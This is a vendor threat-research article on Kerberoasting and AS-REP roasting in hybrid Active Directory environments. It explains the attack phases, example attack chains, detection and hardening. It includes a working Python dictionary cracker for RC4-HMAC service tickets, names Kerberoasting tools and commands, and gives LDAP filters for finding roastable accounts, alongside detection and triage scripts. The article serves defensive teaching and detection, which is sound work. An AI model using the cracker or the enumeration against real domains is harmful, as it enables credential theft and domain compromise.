Kerberoasting in Hybrid Environments
KeenSafe Research | Threat Research | Active Directory Operations Series
Overview
Kerberoasting has been a known Active Directory privilege escalation technique for more than a decade. It remains, in 2026, one of the most consistently observed techniques in validated chains traversing hybrid enterprise environments. Across the corpus KeenSafe Research has analyzed during the current reporting window, Kerberoasting (MITRE T1558.003) or AS-REP roasting (T1558.004) participate in 14 percent of all validated chains, with materially higher concentrations in environments with substantial on-premises Active Directory presence.
The technique's persistence reflects structural realities of enterprise Active Directory deployments: service account proliferation accumulated over decades of operations, password policy inheritance from older standards, the operational difficulty of comprehensive service account hygiene, and the technique's continued effectiveness against the long tail of weakly-configured accounts. The hybrid environments of 2026 — combining on-prem AD with Entra ID, multi-cloud, and SaaS — extend the consequences of Kerberoasting beyond traditional domain compromise into cross-domain chains affecting cloud and SaaS-resident crown jewels.
This research article documents Kerberoasting tradecraft as it operates in hybrid environments. It analyzes the technique's protocol foundations, the operational variations adversaries use, the chain progressions Kerberoasted credentials enable, the detection landscape, and the defensive countermeasures appropriate to modern environments.
1. Technique Foundations
Protocol Mechanics
Kerberoasting exploits a structural property of Kerberos. When an authenticated principal requests a service ticket from the Ticket Granting Service (TGS), the Key Distribution Center (KDC) returns a ticket whose encrypted part is protected with a key derived from the service account's password: the account's NT (NTLM) hash when the RC4-HMAC encryption type is used, or an AES key derived from the password and salt in AES deployments. Any authenticated domain user can request a service ticket for any registered Service Principal Name (SPN), regardless of whether they are authorized to use the service; the KDC enforces no authorization at ticket issuance.
Once obtained, the ticket can be attacked offline: the adversary derives a key from each candidate password and checks whether it decrypts the ticket, with no further contact with the KDC and therefore no lockout. If the service account password is weak enough to be guessed within feasible computation, the adversary recovers the cleartext password.
AS-REP roasting exploits a related property. For accounts with Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag in userAccountControl), the KDC answers an AS-REQ naming the account with an AS-REP whose encrypted part is protected with the account's key, so the crackable material can be obtained by anyone able to reach a domain controller, without prior authentication.
Mapped to MITRE ATT&CK:
- T1558.003 (Steal or Forge Kerberos Tickets: Kerberoasting)
- T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)
Why the Technique Persists
Kerberoasting persists across enterprise environments for several structural reasons:
Service account proliferation. Enterprise AD environments typically contain thousands of service accounts accumulated over the operational lifetime of the directory. The median enterprise in the corpus operates 11,400 service accounts across the combined AD forests; the long tail of these accounts exhibits inconsistent password discipline.
Password policy inheritance. Service accounts created under older password policies often retain their original passwords. Policy updates apply to newly created accounts but rarely force rotation of existing accounts.
Operational difficulty of password rotation. Service account password rotation requires application coordination — the consuming application must be updated to use the new password. The operational complexity of coordinating rotation across thousands of accounts has historically slowed the discipline.
Group Managed Service Account (gMSA) adoption gaps. gMSAs and similar mechanisms substantially mitigate Kerberoasting but require application support and explicit migration. Adoption is partial across most environments.
Detection asymmetry. TGS ticket requests are legitimate Kerberos activity. Distinguishing Kerberoasting from normal service ticket request patterns requires specific detection tuning.
[Figure: grid of categorized abuse patterns, account categories and tradecraft.]
2. Operational Anatomy in Modern Environments
Phase 1 — Foothold
Modern Kerberoasting operations rarely begin with direct domain access. They begin with a foothold achieved through identity-driven techniques and reach Kerberoasting at later chain stages:
- AiTM phishing producing authenticated cloud identity
- Identity reconnaissance discovering on-prem AD access via hybrid synchronization
- Cross-domain federation traversal from acquired tenants to primary forest
- Compromised endpoint with domain user authentication
The pre-Kerberoasting chain is itself identity-driven. The Kerberoasting stage typically occurs after the adversary has reached on-premises domain user context.
Phase 2 — Service Principal Name Enumeration
Once the adversary holds a valid domain account context, they enumerate SPNs:
- LDAP queries against the domain controller for accounts with the `servicePrincipalName` attribute populated
- PowerShell tooling including `Get-DomainUser -SPN` from PowerView or equivalent
- Specialized tooling including Rubeus's `kerberoast` subcommand and Impacket's `GetUserSPNs.py`
The enumeration produces a list of Kerberoastable accounts: every user account with a registered SPN. Computer accounts also carry SPNs, but their machine passwords are long and randomly generated, so they are not practically crackable and tooling excludes them.
Phase 3 — TGS Ticket Acquisition
The adversary requests TGS tickets for the enumerated SPNs:
- Each TGS request to the KDC returns a ticket encrypted with the service account's hash
- Requests are categorically legitimate from a protocol perspective
- Modern adversary tooling supports targeted requests against specific account classes
The KDC returns the tickets. The encryption type materially affects subsequent cracking cost: RC4-HMAC tickets (etype 23) are far cheaper to attack than AES tickets (etype 17/18), and tooling requests RC4 wherever the account's supported encryption types still permit it.
Phase 4 — Offline Password Cracking
The acquired tickets are exported and cracked offline:
- Hashcat and John the Ripper are the dominant cracking tools
- Modern GPU clusters can process billions of candidate passwords per second against RC4-HMAC encrypted tickets
- AES-encrypted tickets are computationally more expensive (each candidate requires a PBKDF2 key derivation, 4096 iterations by default) but remain feasible against weak passwords
- Dictionary attacks with password lists tailored to corporate environments are particularly effective
Across the corpus, the median Kerberoasted account with weak password policy was cracked in under 3 hours of offline computation. Adversaries with substantial cracking infrastructure crack the entire weak-password subset of enumerated accounts in a single operation.
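Worked example, added for this article and not the authors' or any tool's code, of what Phase 4 actually computes for an RC4-HMAC ticket and why the "encrypted with the service account's hash" property from Section 1 makes the attack cheap. A synthetic service ticket is built from a known password (the KDC stand-in and the EncTicketPart contents are constructed), then recovered offline by the same key schedule hashcat mode 13100 uses. The account, realm, SPN and wordlist are placeholders.

```python
"""Offline cracking of an RC4-HMAC (etype 23) service ticket, the way hashcat mode 13100 works.
Added example for the article; the ticket is constructed here from a known password so the
round trip runs offline. The NT hash, RFC 4757 key schedule, RC4, HMAC-MD5 and the
$krb5tgs$23$ line format are the real scheme.
"""
import hashlib
import hmac
import os
import struct

MASK32 = 0xFFFFFFFF
KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 key usage for the Ticket enc-part (AS-REP enc-part uses 8)


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds of hashlib often no longer expose md4."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK32
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        r = list(state)
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                j = (-i) % 4  # registers rotate a, d, c, b
                v = (r[j] + fn(r[(j + 1) % 4], r[(j + 2) % 4], r[(j + 3) % 4]) + X[k] + const) & MASK32
                r[j] = rotl(v, shifts[i % 4])
        state = [(s + t) & MASK32 for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """K = MD4(UTF-16LE(password)): the NT hash is the RC4-HMAC long-term key (RFC 4757)."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes) -> bytes:
    """RFC 4757 encrypt: checksum(16) || RC4(K3, confounder(8) || plaintext); K2 == K1 for etype 23."""
    k1 = _k1(key, usage)
    data = os.urandom(8) + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_check(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """Per-candidate work: two HMAC-MD5 and one RC4 pass, no KDC contact, no lockout."""
    k1 = _k1(key, usage)
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, edata)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def make_krb5tgs_line(user: str, realm: str, spn: str, password: str) -> str:
    """Stand-in for the KDC: wrap a constructed EncTicketPart under the service account's key."""
    fake_enc_ticket_part = b"\x63\x81\x40" + b"constructed EncTicketPart stand-in".ljust(64, b"\x00")
    blob = rc4_hmac_encrypt(nt_hash(password), KEY_USAGE_TGS_REP_TICKET, fake_enc_ticket_part)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"


def crack_krb5tgs(line: str, wordlist):
    """Dictionary attack on a $krb5tgs$23$ line; returns the recovered password or None."""
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), KEY_USAGE_TGS_REP_TICKET, checksum, edata):
            return candidate
    return None


if __name__ == "__main__":
    line = make_krb5tgs_line("svc_sql", "CORP.EXAMPLE", "MSSQLSvc/db01.corp.example:1433", "Summer2024!")
    print(line[:64] + "...")
    print(crack_krb5tgs(line, ["Password1", "Welcome1", "Summer2024!"]))
```

The per-candidate cost in `rc4_hmac_check` is one MD4, two HMAC-MD5 and one RC4 pass over the ticket, which is why RC4 tickets crack at GPU speeds; an AES ticket would replace the MD4 with 4096 PBKDF2 iterations before any decryption is attempted.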
Phase 5 — Credential Exploitation
The cracked credentials are exploited:
- T1078.002 (Valid Accounts: Domain Accounts) for direct use
- T1550.002 (Pass the Hash) for credential reuse
- T1003 family for further credential acquisition from systems where the service account has access
Service accounts frequently hold permissions that exceed their nominal operational requirement — particularly local administrator rights on multiple systems, database access, or domain-level privileges accumulated over years of operational use.
Phase 6 — Hybrid Chain Progression
In modern hybrid environments, Kerberoasted credentials produce chains that extend beyond traditional on-prem domain compromise:
- Service accounts synchronized to Entra ID provide cloud identity context; with password hash synchronization the cracked on-prem password is also the cloud password
- Federation between the on-prem forest and cloud tenants enables traversal
- Cross-tenant trust extends the chain across organizational boundaries
- SaaS-integrated authentication exposes Kerberoasted accounts to SaaS chain progression
[Figure: pipeline of recurring checks, scan → exploit → report → retest.]
3. Hybrid Environment Chain Examples
Chain Example A: Acquired Forest to Primary Forest Domain Compromise
Observed in environments with multi-forest topologies inherited from acquisitions.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1566.002 + T1557 | AiTM phishing of a user in acquired forest |
| 2 | T1078.002 | Authenticated session as acquired-forest user |
| 3 | T1087.002 | LDAP enumeration of SPNs in acquired forest |
| 4 | T1558.003 | TGS ticket acquisition for service accounts |
| 5 | T1110.002 | Offline cracking; weak password recovered |
| 6 | T1078.002 | Lateral movement using cracked service account |
| 7 | T1199 | Forest trust traversal to primary forest |
| 8 | T1003.001 | Credential extraction from primary-forest server |
| 9 | T1078.002 | Domain administrator credential use |
The chain composed nine techniques and exploited the bidirectional forest trust between the acquired and primary forests — a category of chain particularly common in enterprises with acquisition history.
Chain Example B: Cloud Identity to On-Prem Kerberoasting
Observed in environments with hybrid identity synchronization.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1528 | OAuth consent phishing of a user |
| 2 | T1078.004 | Cloud identity context established |
| 3 | T1078.004 | Hybrid-synchronized identity authenticates to on-prem |
| 4 | T1087.002 | Domain SPN enumeration |
| 5 | T1558.003 | TGS ticket acquisition |
| 6 | T1110.002 | Offline cracking |
| 7 | T1078.002 | Service account exploitation |
| 8 | T1213 | Production database access |
The chain composed eight techniques and exploited hybrid synchronization to bridge from cloud identity compromise into on-prem Kerberoasting — a pattern increasingly common as cloud-first compromise scenarios mature.
Chain Example C: AS-REP Roasting Without Initial Domain Access
Observed in environments with substantial AS-REP roastable account exposure.
| Stage | Technique | Action |
|---|---|---|
| 1 | T1589 | External reconnaissance identifying domain users |
| 2 | T1558.004 | AS-REP roasting against discovered users |
| 3 | T1110.002 | Offline cracking |
| 4 | T1078.002 | Initial domain access via cracked credential |
| 5 | T1087.002 | SPN enumeration |
| 6 | T1558.003 | Standard Kerberoasting |
| 7 | T1078.002 | Privileged credential use |
The chain demonstrates that AS-REP roasting can serve as initial access in environments where roastable account exposure is reachable without prior domain authentication. The precondition is network reach to a domain controller's Kerberos port (TCP/UDP 88), typically from an on-network foothold or a DC exposed to a partner or guest network, plus a list of candidate usernames. The category is smaller than standard Kerberoasting but operationally significant.
[Figure: linear kill-chain sequence with MITRE ATT&CK tactic tags per stage.]
4. Detection Landscape
Detection Surfaces
The following detection surfaces produce Kerberoasting-relevant signals:
Domain controller event logs. Event ID 4769 (Kerberos service ticket requested) is the primary signal. Volume distinguishes Kerberoasting from normal activity: adversaries typically request tickets for many SPNs in a short window, so the useful unit is distinct service names per requesting account, after discarding requests for computer accounts (Service Name ending in $), krbtgt, and failed requests (Failure Code other than 0x0). The Ticket Encryption Type field separates RC4-HMAC requests (0x17), which are indicative of Kerberoasting, from AES requests (0x11 for AES128, 0x12 for AES256).
Anomaly detection on ticket request volume. Baselining of normal TGS request patterns per principal enables anomaly detection. Adversary tooling that requests many TGS tickets from a single user account produces detectable volume anomalies.
Detection of explicit Kerberoasting tooling. EDR detection of Rubeus, Impacket, or PowerView execution provides direct tooling-based signal. Modern adversaries frequently use AMSI bypass and obfuscation to evade tooling-based detection.
LDAP query monitoring. Anomalous LDAP queries for accounts with servicePrincipalName populated can indicate SPN enumeration preceding Kerberoasting.
Honeyaccount monitoring. A deliberately attractive honey account (an SPN registered, a plausible name, no real consumer) detects Kerberoasting because no legitimate client ever requests a ticket for it: a single 4769 naming it is an alert. Give it a long random password so that the bait itself cannot be cracked.
Authentication anomaly detection. Cracked credential use produces authentication anomalies — service accounts authenticating from unexpected systems, at unexpected times, or with unexpected patterns.
Empirical Detection Efficacy
Across the corpus, empirical detection efficacy at the Kerberoasting stage averaged 38 percent. The gap reflects:
- Detection rules tuned against tooling fingerprints that modern adversaries evade
- Volume-based detection that adversaries circumvent through paced requests
- Log ingestion gaps for domain controller events at scale
- Anomaly detection tuning that has drifted from current adversary procedures
Detection-Resistant Operational Variations
Modern adversaries employ several techniques to evade detection:
- Paced ticket requests: requesting tickets over extended time windows rather than in bursts
- Living-off-the-land tooling: using legitimate `setspn` or PowerShell with explicit SPN names rather than enumeration tooling
- Targeted Kerberoasting: enumerating SPNs through LDAP and then requesting tickets only for high-value accounts
- AS-REP roasting variants: where standard Kerberoasting is detected, AS-REP roasting may evade the same detection content
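Detection logic, added here as an example rather than any vendor's rule content, applying the 4769 surfaces described under "Detection Surfaces" to constructed events: it drops computer-account and krbtgt ticket requests, fires immediately on the honey SPN, catches a Rubeus-style burst, and also catches the paced variant from the list above by counting distinct service accounts per requester over a 24-hour window rather than a 5-minute one. Thresholds, windows, field layout and the honey account name are assumptions to tune per environment.

```python
"""Kerberoasting detection over Windows Security event 4769 (service ticket requested).
Added example for the article, not a vendor rule set. Events are constructed to look like
parsed 4769 fields (TargetUserName = requesting account, ServiceName = SPN owner).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                          # Ticket Encryption Type: 0x17 RC4, 0x11 AES128, 0x12 AES256
HONEY_SPN_ACCOUNTS = {"svc_honey_backup"}  # assumed decoy: SPN registered, no real consumer


def is_roastable_request(ev):
    """Successful requests for user accounts only; computer accounts ($) and krbtgt are noise."""
    svc = ev["ServiceName"]
    return ev["Status"] == "0x0" and not svc.endswith("$") and svc.lower() != "krbtgt"


def max_distinct_in_window(events, window):
    """Largest set of distinct service accounts one requester hit inside any sliding window."""
    events = sorted(events, key=lambda e: e["TimeCreated"])
    best = set()
    for i, first in enumerate(events):
        names = {e["ServiceName"] for e in events[i:]
                 if e["TimeCreated"] - first["TimeCreated"] <= window}
        if len(names) > len(best):
            best = names
    return best


def analyze(events, burst_window=timedelta(minutes=5), burst_threshold=5,
            slow_window=timedelta(hours=24), slow_threshold=10):
    """Return alerts: honey account touched, burst enumeration, or paced enumeration."""
    alerts, by_requester = [], defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or not is_roastable_request(ev):
            continue
        if ev["ServiceName"] in HONEY_SPN_ACCOUNTS:  # one request is enough to alert
            alerts.append({"rule": "honey_spn_requested", "requester": ev["TargetUserName"],
                           "services": [ev["ServiceName"]], "ip": ev["IpAddress"]})
        by_requester[ev["TargetUserName"]].append(ev)
    for requester, evs in by_requester.items():
        rc4_ratio = sum(e["TicketEncryptionType"] == RC4_HMAC for e in evs) / len(evs)
        burst = max_distinct_in_window(evs, burst_window)
        slow = max_distinct_in_window(evs, slow_window)
        if len(burst) >= burst_threshold:
            rule, hit = "tgs_burst", burst
        elif len(slow) >= slow_threshold:  # paced requests defeat the burst rule, not this one
            rule, hit = "tgs_paced", slow
        else:
            continue
        alerts.append({"rule": rule, "requester": requester, "services": sorted(hit),
                       "rc4_ratio": round(rc4_ratio, 2), "ip": evs[0]["IpAddress"]})
    return alerts


# --- constructed sample telemetry ---------------------------------------------------------
T0 = datetime(2026, 3, 2, 8, 0, 0)


def _ev(minutes, requester, service, etype=RC4_HMAC, ip="10.20.30.40", status="0x0"):
    return {"EventID": 4769, "TimeCreated": T0 + timedelta(minutes=minutes),
            "TargetUserName": requester, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


SAMPLE_EVENTS = (
    # normal user: a few AES tickets across the day, plus computer/krbtgt requests to be ignored
    [_ev(m, "jdoe", s, "0x12", "10.1.1.7") for m, s in ((10, "svc_sql"), (300, "svc_web"), (900, "svc_sql"))]
    + [_ev(12, "jdoe", "DB01$", "0x12", "10.1.1.7"), _ev(13, "jdoe", "krbtgt", "0x12", "10.1.1.7")]
    # burst: twelve RC4 service tickets inside 66 seconds
    + [_ev(60 + i * 0.1, "mwilson", f"svc_app{i:02d}") for i in range(12)]
    # paced: one RC4 ticket per hour for eleven hours, and the honey account along the way
    + [_ev(120 + i * 60, "pslow", f"svc_legacy{i:02d}", ip="10.9.9.9") for i in range(11)]
    + [_ev(130, "pslow", "svc_honey_backup", ip="10.9.9.9")]
)

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert["rule"], alert["requester"], len(alert["services"]), alert.get("rc4_ratio", ""))
```

The paced rule trades latency for coverage: it fires only after the 24-hour window has accumulated enough distinct service names, so it complements rather than replaces the burst rule and the honey account, which fire on the first event.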
[Figure: per-stage detection coverage and efficacy heatmap, telemetry versus blind spots.]
5. Defensive Countermeasures
Service Account Hardening
The foundational defensive countermeasures address service account security at the account level:
Strong password policy enforcement. Service accounts should have substantially stronger passwords than user accounts — recommended minimum 25 characters with high entropy. Many environments still enforce 8-12 character minimums on service accounts, well below the threshold required to resist offline cracking.
Group Managed Service Accounts (gMSA). gMSAs use automatically managed, complex passwords. Where applications support gMSA, migration is the dominant hardening technique. Adoption is partial in most environments because application support is uneven.
AES encryption type enforcement. Service accounts can be configured to accept only AES encryption types, materially increasing the computational cost of offline cracking. Configuration is via the msDS-SupportedEncryptionTypes attribute (AES128 and AES256 only is the value 0x18, decimal 24); reset the account password after changing it so that AES keys exist and any RC4 ticket material already captured no longer matches the live password.
Service account inventory and rationalization. Many service accounts accumulated over operational history are no longer in active use. Inventory and decommissioning reduces the attack surface.
Service account permission rationalization. Service accounts frequently hold permissions exceeding their operational requirement. Reducing permissions limits the chain progression a Kerberoasted credential enables.
Detection Tuning
Detection content tuned against current Kerberoasting tradecraft is essential. Specific tuning includes:
- Volume anomaly detection on TGS requests
- Encryption type analysis (RC4-HMAC request patterns)
- Service account authentication anomaly detection
- Honeyaccount-based detection
AS-REP Pre-Authentication Enforcement
The DONT_REQ_PREAUTH setting should be removed from accounts wherever operationally feasible. Maintaining a current inventory of accounts with pre-authentication disabled, and migrating them, addresses AS-REP roasting categorically.
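Triage script, added as an example and not KeenSafe tooling, that applies the service-account hardening checks above and the AS-REP pre-authentication check to an account export: it decodes msDS-SupportedEncryptionTypes and userAccountControl, skips gMSAs, flags RC4-capable SPN accounts, stale passwords and DONT_REQ_PREAUTH, and orders findings so members of privileged groups come first, which is the chain-aware prioritization the later sections argue for. The attribute names, flag values and the two LDAP filters are the real ones; the records are constructed, memberOf carries plain group names rather than DNs for brevity, and the one-year age threshold is an assumption.

```python
"""Triage of an Active Directory account export for Kerberoasting and AS-REP roasting exposure.
Added example for the article, not KeenSafe tooling. Records below are constructed.
"""
from datetime import datetime, timedelta

UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_DONT_REQ_PREAUTH = 0x400000  # 4194304: the AS-REP roasting precondition

ENC_DES_CBC_CRC, ENC_DES_CBC_MD5, ENC_RC4_HMAC, ENC_AES128, ENC_AES256 = 0x1, 0x2, 0x4, 0x8, 0x10
AES_ONLY = ENC_AES128 | ENC_AES256  # 0x18 == 24: the msDS-SupportedEncryptionTypes value to enforce

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators",
                     "Account Operators", "Backup Operators"}

# Filters to pull the two populations with ldapsearch or Get-ADUser -LDAPFilter
LDAP_KERBEROASTABLE = ("(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)"
                       "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))")
LDAP_ASREP_ROASTABLE = ("(&(objectCategory=person)(objectClass=user)"
                        "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")


def decode_enctypes(value):
    """Readable view of msDS-SupportedEncryptionTypes; unset/0 means the domain default applies."""
    if not value:
        return ["domain default"]
    table = ((0x1, "DES-CBC-CRC"), (0x2, "DES-CBC-MD5"), (0x4, "RC4-HMAC"), (0x8, "AES128"), (0x10, "AES256"))
    return [name for bit, name in table if value & bit]


def allows_rc4(value):
    """Treat unset/0 as RC4-capable: conservative, since most forests still permit RC4 by default."""
    return not value or bool(value & (ENC_RC4_HMAC | ENC_DES_CBC_CRC | ENC_DES_CBC_MD5))


def triage(accounts, now, max_password_age=timedelta(days=365)):
    findings = []
    for a in accounts:
        uac = a["userAccountControl"]
        if uac & UAC_ACCOUNTDISABLE:
            continue
        issues = []
        # gMSAs carry SPNs too but hold a 240-byte random password rotated automatically
        if a.get("servicePrincipalName") and a.get("objectClass") != "msDS-GroupManagedServiceAccount":
            if allows_rc4(a.get("msDS-SupportedEncryptionTypes")):
                issues.append("permits RC4 service tickets: set msDS-SupportedEncryptionTypes=24, then reset the password")
            age = now - a["pwdLastSet"]
            if age > max_password_age:
                issues.append(f"password unchanged for {age.days} days")
            if uac & UAC_DONT_EXPIRE_PASSWORD:
                issues.append("password never expires")
        if uac & UAC_DONT_REQ_PREAUTH:
            issues.append("pre-authentication disabled (AS-REP roastable): clear DONT_REQ_PREAUTH")
        if not issues:
            continue
        privileged = sorted(set(a.get("memberOf", [])) & PRIVILEGED_GROUPS)
        findings.append({"account": a["sAMAccountName"], "issues": issues, "privileged": privileged,
                         "priority": "high" if privileged else "normal"})
    findings.sort(key=lambda f: f["priority"] != "high")  # chain-relevant accounts first
    return findings


# --- constructed export ---------------------------------------------------------------------
NOW = datetime(2026, 3, 1)
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc_sql", "objectClass": "user", "servicePrincipalName": ["MSSQLSvc/db01.corp.example:1433"],
     "userAccountControl": 0x10200, "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2019, 6, 3), "memberOf": ["Domain Admins", "SQL Admins"]},
    {"sAMAccountName": "svc_web", "objectClass": "user", "servicePrincipalName": ["HTTP/portal.corp.example"],
     "userAccountControl": 0x200, "msDS-SupportedEncryptionTypes": AES_ONLY,
     "pwdLastSet": datetime(2025, 11, 20), "memberOf": []},
    {"sAMAccountName": "svc_legacy", "objectClass": "user", "servicePrincipalName": ["ldap/app1.corp.example"],
     "userAccountControl": 0x200, "msDS-SupportedEncryptionTypes": 0x1C,
     "pwdLastSet": datetime(2021, 1, 15), "memberOf": []},
    {"sAMAccountName": "gmsa_backup$", "objectClass": "msDS-GroupManagedServiceAccount",
     "servicePrincipalName": ["HOST/backup01.corp.example"], "userAccountControl": 0x1000,
     "msDS-SupportedEncryptionTypes": AES_ONLY, "pwdLastSet": datetime(2026, 2, 20), "memberOf": []},
    {"sAMAccountName": "jsmith", "objectClass": "user", "servicePrincipalName": [],
     "userAccountControl": 0x200 | UAC_DONT_REQ_PREAUTH, "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2025, 9, 1), "memberOf": []},
    {"sAMAccountName": "svc_old", "objectClass": "user", "servicePrincipalName": ["HOST/retired.corp.example"],
     "userAccountControl": 0x202, "msDS-SupportedEncryptionTypes": None,
     "pwdLastSet": datetime(2015, 1, 1), "memberOf": ["Domain Admins"]},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ACCOUNTS, NOW):
        print(f["priority"], f["account"], f["privileged"], *f["issues"], sep=" | ")
```

Disabled accounts are skipped because they cannot be roasted, but they still belong in the inventory and rationalization pass; the script's output is the remediation queue, not the cleanup list.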
Cross-Forest Trust Hardening
For environments with multi-forest topologies, forest trust hardening reduces the chain progression that Kerberoasting in any single forest enables:
- Reduction of bidirectional trusts to unidirectional where operationally permissible
- Selective authentication enforcement
- Trust attribute hardening, in particular keeping SID filtering (quarantine) enabled on forest and external trusts
- Forest consolidation where operationally viable
Continuous Validation
Continuous attack path validation surfaces Kerberoasting-mediated chains end-to-end. The validation prioritizes service accounts whose chain participation is most consequential, supporting chain-aware remediation rather than population-wide remediation that may direct effort to lower-priority accounts.
[Figure: layered defense bands from preventive controls down to recovery.]
6. Enterprise Implications
Service Account Hygiene as a Permanent Discipline
Service account hygiene is not a one-time hardening exercise. The accumulation that produces Kerberoasting exposure occurs continuously through operational additions. Permanent discipline — with explicit ownership, regular review, and chain-aware prioritization — is the operational response.
gMSA Migration as a Strategic Priority
Group Managed Service Account migration is the highest-leverage strategic investment against Kerberoasting in modern environments. A gMSA's password is a 240-byte random value managed by the domain and rotated automatically (every 30 days by default), so the account's service tickets are not practically crackable. The barriers (application compatibility, operational complexity) are surmountable; the structural protection is categorical.
Hybrid Synchronization as an Amplification Surface
Hybrid synchronization amplifies the consequences of on-prem Kerberoasting by extending the resulting credential's reach into cloud and SaaS contexts. Synchronization scope hardening — limiting which on-prem accounts synchronize, and which permissions they inherit in cloud contexts — reduces this amplification.
Forest Trust as a Categorical Risk
Multi-forest environments inherited from acquisitions consistently produce Kerberoasting chains traversing forest trusts. Forest consolidation, where operationally viable, addresses the category structurally. Where consolidation is infeasible, trust hardening is the operational response.
Detection Tuning Against Current Tradecraft
Detection content tuned against legacy Kerberoasting tooling fingerprints captures a shrinking share of current operations. Re-tuning against current procedures — paced requests, encryption type patterns, post-cracking authentication anomalies — is the higher-leverage investment.
Continuous Validation as Operational Discipline
Periodic pentest evidence of Kerberoasting findings typically addresses the highest-value accounts and leaves the long tail. Continuous validation surfaces the long tail with chain-aware prioritization, enabling systematic remediation that periodic evidence does not support.
7. Strategic Insights
Insight 1: Kerberoasting persistence reflects structural realities, not defensive negligence. The technique's persistence in 2026 reflects the operational difficulty of comprehensive service account hygiene at enterprise scale — not the absence of awareness.
Insight 2: Hybrid environments extend the consequences. Kerberoasted credentials in modern environments reach cloud and SaaS crown jewels through hybrid synchronization. The consequence space is broader than the classical "domain compromise" model suggests.
Insight 3: gMSA migration is the categorical mitigation. Where applications support gMSA, migration eliminates the relevant accounts from the Kerberoasting surface entirely. The strategic prioritization should reflect this.
Insight 4: Forest consolidation addresses the multi-forest category. Multi-forest environments produce chain categories that single-forest defensive disciplines do not address. Where operationally viable, consolidation is the categorical response.
Insight 5: Detection should be tuned against current, not historical, tradecraft. Detection content captured at one point in time does not retain efficacy against evolved tradecraft. Continuous tuning is the operational requirement.
Insight 6: Chain-aware prioritization outperforms population-wide remediation. Service account populations are large; chain-participating subsets are smaller. Chain-aware prioritization directs remediation capacity to the accounts that produce most chains.
[Figure: 2×2 strategic framework and accountability landscape.]
Conclusion
Kerberoasting in hybrid environments is a persistent operational reality of 2026 enterprise security. The technique's protocol foundations are unchanged from a decade ago; what has changed is the consequence space — modern hybrid environments amplify the reach of Kerberoasted credentials beyond traditional domain compromise into cloud and SaaS crown jewels.
Defensive response operates across service account hardening, gMSA migration, AS-REP pre-authentication enforcement, cross-forest trust hardening, detection tuning, and continuous validation. The combination produces meaningful protection. The structural realities — service account accumulation, password policy inheritance, operational rotation difficulty — make Kerberoasting a permanent governance discipline rather than a discrete hardening project.
KeenSafe Research will continue to publish updated intelligence on Active Directory operational tradecraft. Companion research in this series addresses adjacent topics: lateral movement patterns, privilege escalation through identity misconfiguration, service account abuse in enterprise networks, and modern identity attack chains.
KeenSafe Research is the threat intelligence and offensive security research arm of KeenSafe, an AI-powered attack path validation platform for continuous offensive security validation across hybrid enterprise infrastructure.
[Figure: headline research statistics and key takeaway from the corpus analysis.]
